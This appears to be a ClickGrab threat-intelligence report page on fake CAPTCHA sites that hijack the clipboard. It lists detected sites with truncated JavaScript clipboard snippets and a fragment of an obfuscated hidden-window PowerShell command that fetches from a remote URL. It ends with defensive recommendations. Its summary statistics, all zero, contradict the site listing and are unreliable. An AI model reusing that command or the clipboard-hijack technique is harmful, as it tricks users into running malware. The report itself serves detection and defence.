Threat Intelligence Report
Attack Pattern Analysis
Top Indicators/Keywords
Malicious Sites Detected
Click on a site to view detailed analysis💻 PowerShell Commands 1
🔍 Suspicious Keywords 4
📋 Clipboard Manipulation Code
Showing first 1 of 1 entries (truncated for performance)
...= ""; } function copyToClipboard() { navigator.clipboard.writeText ("powershell -w h powershell 'cu%%%r%l% %%http%%://sa...
💻 PowerShell Commands 2
🔍 Suspicious Keywords 8
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 2
🔍 Suspicious Keywords 7
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 7
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
🔍 Suspicious Keywords 6
🌐 Extracted URLs 4
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
🔍 Suspicious Keywords 7
🌐 Extracted URLs 46
📋 Clipboard Manipulation Code
Showing first 1 of 1 entries (truncated for performance)
...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...
🔍 Suspicious Keywords 4
🔍 Suspicious Keywords 4
Showing top 20 malicious sites. 2 additional sites detected.
Technical Analysis
ClickGrab Threat Analysis Report - 2025-06-16
Generated on 2025-06-17 13:41:02
Executive Summary
- Total sites analyzed: 0
- Sites with malicious content: 0
- Unique domains encountered: 0
- Total URLs extracted: 0
- PowerShell download attempts: 0
- Clipboard manipulation instances: 0
Domain Analysis
Most Frequently Encountered Domains
URL Pattern Analysis
Attack Pattern Reconstruction
Key Findings
- Prevalence: 0.0% of analyzed sites contained malicious content
- Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
- Target Platform: Windows systems via PowerShell execution
- Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA
Recommendations
- User Education: Warn users about fake CAPTCHA verification schemes
- Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
- URL Filtering: Block known malicious domains identified in this analysis
- PowerShell Execution Policy: Restrict PowerShell execution in corporate environments